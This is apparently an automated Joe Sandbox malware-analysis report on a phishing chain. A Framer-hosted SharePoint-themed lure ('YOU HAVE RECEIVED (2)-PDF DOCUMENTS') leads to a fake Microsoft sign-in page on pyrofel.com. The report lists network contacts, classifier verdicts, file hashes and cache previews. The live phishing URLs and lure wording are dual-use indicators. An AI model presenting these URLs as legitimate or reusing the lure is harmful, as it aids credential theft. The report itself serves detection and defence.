52.223.52.2	magical-variation-300980.framer.app	United States		8987	AMAZONEXPANSIONGB	false
142.250.184.228	www.google.com	United States		15169	GOOGLEUS	false
104.17.25.14	unknown	United States		13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.17
192.168.2.16
192.168.2.18

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522633
Start date and time:	2024-09-30 13:57:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://magical-variation-300980.framer.app/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.phis.win@20/28@34/240

Warnings

Exclude process from analysis (whitelisted): TextInputHost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.250.185.206, 74.125.133.84, 34.104.35.123
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information

LLM Input / Output

Input	Output
URL: https://magical-variation-300980.framer.app/ Model: jbxai	{ "brand":["SharePoint"], "contains_trigger_text":true, "trigger_text":"YOU HAVE RECEIVED (2)-PDF DOCUMENTS FOR YOUR REVIEW", "prominent_button_name":"Preview Documents", "text_input_field_labels":"unknown", "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html Model: jbxai	{ "brand":["Cloudflare"], "contains_trigger_text":true, "trigger_text":"Verifying... CLOUDFLARE Privacu. Terms ", "prominent_button_name":"unknown", "text_input_field_labels":"unknown", "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html Model: jbxai	{ "brand":["Microsoft"], "contains_trigger_text":true, "trigger_text":"Sign in", "prominent_button_name":"Next", "text_input_field_labels":["Email, phone, or Skype"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html Model: jbxai	{ "phishing_score":9, "brands":"Microsoft", "legit_domain":"microsoft.com", "classification":"wellknown", "reasons":["The brand 'Microsoft' is a well-known brand.", "The legitimate domain for Microsoft is 'microsoft.com'.", "The provided URL 'pyrofel.com' does not match the legitimate domain name for Microsoft.", "The URL 'pyrofel.com' does not contain any recognizable association with Microsoft.", "The URL 'pyrofel.com' is suspicious as it does not align with the well-known domain structure of Microsoft.", "The presence of input fields for 'Email, phone, or Skype' is typical for Microsoft services, but the domain mismatch is a strong indicator of phishing."], "brand_matches":[false], "url_match":false, "brand_input":"Microsoft", "input_fields":"Email, phone, or Skype"}

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:57:46 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.988883681066014
Encrypted:	false
SSDEEP:
MD5:	8F1E803D51D1B1C6AE89D504D1106D36
SHA1:	D56ED6C7B56124B552E9D314A11966D946624E4B
SHA-256:	546FC1849405DDADF8CB27AA209A06E4EAD4270BAEAF63FF855F471B1FB97B54
SHA-512:	16EB417A96EA34F8DFD34CAEB7B6079DD5028841931148F2A229DB1D32BD7C06B9399F1F51BF2BF1B1A9DE4649A729190542CF0D74787CF6E313623F207FB41B
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....\|../.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I>Y,_....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y4_....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V>Y4_....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V>Y4_...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V>Y7_...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:57:45 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.004489322263787
Encrypted:	false
SSDEEP:
MD5:	88118B6C0696C5EF4CD6AACFE6614CA3
SHA1:	B84CADC63F1A799D3BF75C24A0B67570A081F34A
SHA-256:	F1788988B52D1A0BE1914A7D6E212DF00FF3A2F8B2B8333C3360995928420E2A
SHA-512:	D1F6341B3FECFBEAB41A5D49BE5281C7CD90AEC603B7F0B23E8590DC0DAB675AAA7A5D7BEA391B063B5A0B848EEEE037BF9ED1DE6AB2E3A2FE845AD69163D70A
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......../.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I>Y,_....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y4_....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V>Y4_....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V>Y4_...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V>Y7_...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.013183367408204
Encrypted:	false
SSDEEP:
MD5:	340D258C0D24E48180D9D648A34D9E57
SHA1:	F58E471D2F5B2435198DE569A5558D144D33C86F
SHA-256:	74C60CC18EE292190C4705E6F4D5A571191CBBB3A77815085037CB5A467297A9
SHA-512:	C2AF19A1763E67D2823DB0AA96FE8DD4F575FA29E2E4E00C5185F4FE6881D5D8E0FA009DB69E0688E26D1B3F9591F7F06F3E3BF0F0E42A66E52A1D8496030A61
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I>Y,_....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y4_....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V>Y4_....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V>Y4_...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:57:45 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	4.002429035031391
Encrypted:	false
SSDEEP:
MD5:	81C001F07CB0EDDAD5607602212FEF21
SHA1:	A9E8C54A104DB31DE6E8115B1492774F781A1D04
SHA-256:	C18511352B02D55E20AAA329B85D0F24C7757CB048D0131535DD683130A7BCB8
SHA-512:	71D32E822B2BB607ABADFB0A2B90381A009F8BFDF8337C3282C9FCEED082F1422900A664DA771411CF87715B0B9CC6B44FE2B990A660A43DAE8823C0A576F730
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......./.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I>Y,_....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y4_....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V>Y4_....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V>Y4_...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V>Y7_...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:57:46 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9915045322535585
Encrypted:	false
SSDEEP:
MD5:	6E6F477DA692C9211F721541C8A19D66
SHA1:	547046386B0A4E25DA5EB638D6CAB331B0BF95EF
SHA-256:	12530BA30A3AC937988CE0C57E2F56F956726ECCBB992704CEAA48EF61E08DE1
SHA-512:	D4E452F13F18AB1DB712D29E0862BE585C27F8E9468AA96A318C4D989DAA289EC62C90983F4F812147ABDF672673CD2F9E8804AAA3D7F1516BB66BB4C2588672
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......../.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I>Y,_....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y4_....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V>Y4_....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V>Y4_...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V>Y7_...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:57:45 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	4.002050277677975
Encrypted:	false
SSDEEP:
MD5:	354C6AC4C5DD22AD64CD690CC5F25CE6
SHA1:	12F6C9074C597EA0E64A705FF60FCF773FC236BD
SHA-256:	3E18C7F43290505DDA09E588D9428AECE2E0B5051AC484F6721B60E3EBCD9004
SHA-512:	654AB9F6907D6C1FF26F5BF051E04C78F12DD16E37CD9C777045B07F42427C9410DBA9AC906E87BF1FD20B9F399EC560C7D8D4B751827376868F49C8853F734F
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....G.}./.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I>Y,_....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y4_....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V>Y4_....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V>Y4_...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V>Y7_...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 102

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	223
Entropy (8bit):	5.1754266442935375
Encrypted:	false
SSDEEP:
MD5:	810193EDE98443698BA6B54575E9CF3C
SHA1:	719632E21DDF2A8CAFE2423E86520E515B621241
SHA-256:	A8C604F5780004055234EB042141127C52ABE99560F73A8F68395BFF99C38EC4
SHA-512:	5C43545615F5A6BCEBF243FF011AA1D88DEC94FE2288FBED7227076D481B44627E9FE3E620B655AFDA2DCAFFE5754FE577EBBFEE04B9BDBC86841A9AF42CC0EA
Malicious:	false
Reputation:	unknown
URL:	https://framerusercontent.com/sites/icons/default-favicon-light.v1.png
Preview:	.PNG........IHDR...@...@......iq.....IDATx.....BA...-.:.5.>T....\|...v{.S.ww......................................o.....0.a:.t......#LG..0.a:.t......#LG..0.a:._.'........................................8.r.M.......IEND.B`.

Chrome Cache Entry: 104

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	44
Entropy (8bit):	4.896820539042673
Encrypted:	false
SSDEEP:
MD5:	F5FE0CAB78140E0E5AA29F68CE8C2888
SHA1:	4E02FF9F9E7144B978E8C80EDA3A4CABE5288B0B
SHA-256:	7B2FAEC4335DE81ABBF1EBF794F91A4F2B870B317093448B84082B5F411C741C
SHA-512:	219FF2BEDE0A09541154FD6772534975BE577F70F72D3D856DF28448EABB6BBBF1784164D7D063449B524FC5C7C3899132473535E1713FBAC4E9E935587A3CCE
Malicious:	false
Reputation:	unknown
URL:	https://framerusercontent.com/sites/6YYuQ1FLDalWCuDrLyjZQj/chunk-42U43NKG.mjs
Preview:	//# sourceMappingURL=chunk-42U43NKG.mjs.map.

Chrome Cache Entry: 105

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (47992), with no line terminators
Category:	dropped
Size (bytes):	47992
Entropy (8bit):	5.605846858683577
Encrypted:	false
SSDEEP:
MD5:	CF3402D7483B127DED4069D651EA4A22
SHA1:	BDE186152457CACF9C35477B5BDDA5BCB56B1F45
SHA-256:	EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
SHA-512:	9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
Malicious:	false
Reputation:	unknown
Preview:	!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt\|\|function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create\|\|function(t){var e;return n.prototype=t,e=new n,n.prototype=null

Chrome Cache Entry: 106

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	unknown
URL:	https://code.jquery.com/jquery-3.6.0.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 107

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (36412), with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	41230
Entropy (8bit):	5.024933597412232
Encrypted:	false
SSDEEP:
MD5:	0E26FDC305D35964AABF8B1817CA86FA
SHA1:	0263CDCB4D5D8B004152F288980071B66853F730
SHA-256:	8A91D687030400AE9EA7FEF00B1D03B572073B0D92837A8EA7FFDE3BCF8AD4F9
SHA-512:	049540463A27CCD8070BD66ECED96E094A67840E0A88A7465E4E554EBCBCAA2CC88ACEB470F43A980D07A850B80479772AFF484432A97B78F37A2224342DB48A
Malicious:	false
Reputation:	unknown
URL:	https://magical-variation-300980.framer.app/
Preview:	<!doctype html>.. . Built with Framer . https://www.framer.com/ -->..<html>..<head>.. <meta charset="utf-8">.. .. .. Start of headStart -->.. .. End of headStart -->.. <meta name="viewport" content="width=1200">.. <meta name="generator" content="Framer 0b8b5e5">.. <title>My Framer Site</title>.. <meta name="description" content="Made with Framer">.. <meta name="framer-search-index" content="https://framerusercontent.com/sites/6YYuQ1FLDalWCuDrLyjZQj/searchIndex-aXjCZ_HS3Lrq.json">.. <link href="https://framerusercontent.com/sites/icons/default-favicon-light.v1.png" rel="icon" media="(prefers-color-scheme: light)">.. <link href="https://framerusercontent.com/sites/icons/default-favicon-dark.v1.png" rel="icon" media="(prefers-color-scheme: dark)">.. <link rel="apple-touch-icon" href="https://framerusercontent.com/sites/icons/default-touch-icon.v3.png">.. Open Graph / Facebook -->.. <meta property="og:type" content="web

Chrome Cache Entry: 108

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (18088)
Category:	dropped
Size (bytes):	18089
Entropy (8bit):	5.178183231621744
Encrypted:	false
SSDEEP:
MD5:	980FD56F4DE8C70875F97ECDADE4545D
SHA1:	86FA83F95B43167CBB587D441FC85C0BC2A2F346
SHA-256:	2E1A2AC17CDB96C3C75F3EE659733C110B73392955CC9523DFFDCF04254AAA63
SHA-512:	BBC83C50E352F9DE7FC758B2871F36A7721F0F39E28465A0CF36788FFFBCC0D3996582267593079C3FC9E8B2EB30710C151EB3A6CA37D8D44BA4F3832D1D2036
Malicious:	false
Reputation:	unknown
Preview:	"use strict";(()=>{var V,$,P=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},R=function(e){if(document.readyState==="loading")return"loading";var t=P();if(t){if(e<t.domInteractive)return"loading";if(t.domContentLoadedEventStart===0\|\|e<t.domContentLoadedEventStart)return"dom-interactive";if(t.domComplete===0\|\|e<t.domComplete)return"dom-content-loaded"}return"complete"},Ie=function(e){var t=e.nodeName;return e.nodeType===1?t.toLowerCase():t.toUpperCase().replace(/^#/,"")},G=function(e,t){var r="";try{for(;e&&e.nodeType!==9;){var a=e,i=a.id?"#"+a.id:Ie(a)+(a.classList&&a.classList.value&&a.classList.value.trim()&&a.classList.value.trim().length?"."+a.classList.value.trim().replace(/\s+/g,"."):"");if(r.length+i.length>(t\|\|100)-1)return r\|\|i;if(r=r?i+">"+r:i,a.id)break;e=a.parentNode}}catch{}return r},oe=-1,se=function(){return oe},M=function(e){addEventListene

Chrome Cache Entry: 109

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Java source, ASCII text, with very long lines (2926)
Category:	downloaded
Size (bytes):	2977
Entropy (8bit):	5.461526666930152
Encrypted:	false
SSDEEP:
MD5:	EB7083B78A492F392363ACF02D44993D
SHA1:	F893C4592D05D5ECB6C6A345821D7B187B875B62
SHA-256:	F5028B27C6E94F7DE61F01D57FF65290E13563D13E2A19C6BE2881F856A59A99
SHA-512:	D16EC11BEDB8925C17A3F75BE8F05E1AF873BDE08DF74EA12C905B53B16D23087C93EF7658818AD7D789EE87B36CF8CE23C950EC479DEADFD70052EED7DD45B7
Malicious:	false
Reputation:	unknown
URL:	https://framerusercontent.com/sites/6YYuQ1FLDalWCuDrLyjZQj/script_main.V57BLPRN.mjs
Preview:	import{B as P,C as S,E as w,I as O,L as x,Q as D,R as M,Y as V,c as h,d as o,f as b,fa as B,g as l,t as v,u as _,v as f,w as F,x as E,y as k,z as I}from"./chunk-6YCP7OQD.mjs";import{c as t}from"./chunk-RIUMFBNJ.mjs";var W="default"in _?v:_,m={},H=W;m.createRoot=H.createRoot;m.hydrateRoot=H.hydrateRoot;var u=m.createRoot,N=m.hydrateRoot;var p={augiA20Il:{elements:{},page:f(()=>import("./dqa62RV-tPrLEha76eKIvRwZbVeC4htPQYBjwJWsq1I.4MC2Q4TL.mjs")),path:"/"}},z=[{code:"en-US",id:"default",name:"English",slug:""}];async function J({routeId:a,pathVariables:n,localeId:r}){await p[a].page.preload();let s=o(M,{isWebsite:!0,routeId:a,pathVariables:n,routes:p,collectionUtils:{},framerSiteId:"2c0050db49f8d7d6cbb7e438e721e7d271b1b5d43cdc8ae00ec4c1216b477676",notFoundPage:f(()=>import("./SitesNotFoundPage.js@1.1-AIYWDYOH.mjs")),isReducedMotion:void 0,localeId:r,locales:z,preserveQueryParams:void 0}),c=o(D,{children:s,value:{enableAsyncURLUpdates:!1,useGranularSuspense:!1}});return o(F,{children:c,va

Chrome Cache Entry: 111

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 90 x 21, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	4.014960565232003
Encrypted:	false
SSDEEP:
MD5:	CBA517EF0A0F4975AB498B82F8AED12A
SHA1:	829743669ED4CBD26002ECD3E05F3E5B44F29F12
SHA-256:	232D922AC0B1072919DCB2D5C0A5C06BA4AD6BFFCD9EC18BD2FC5CB62188F64D
SHA-512:	931924874D15E6BE6BBDB628FD70C79FB4E29DEBB50EAAF7AA0C5436AA50C2B38CE26AED4A36E106822748D4962717CF429DE97438137F9AED9902A2DE77E542
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...Z.........I.n.....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 112

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (2826), with CRLF line terminators
Category:	downloaded
Size (bytes):	5947
Entropy (8bit):	5.766918443511268
Encrypted:	false
SSDEEP:
MD5:	44D6774FA0FDE728507A32CDFE00D116
SHA1:	5DA9CD67B6B5DBDA9834147E10FC160C286C000E
SHA-256:	B04B6DEE53A838FC516C5EC918FF7A2158E88856809035BEFEABB608E18225BC
SHA-512:	E10CDA1B2B71FCE7491071A9670CA75F3DCF394201A6CB35D18D5D466B8B119D6717EC2DF8B87AC3EFAB55E7F6944CD7EED0822ED010A7416EF5DBBDB1DDEB8D
Malicious:	false
Reputation:	unknown
URL:	https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html
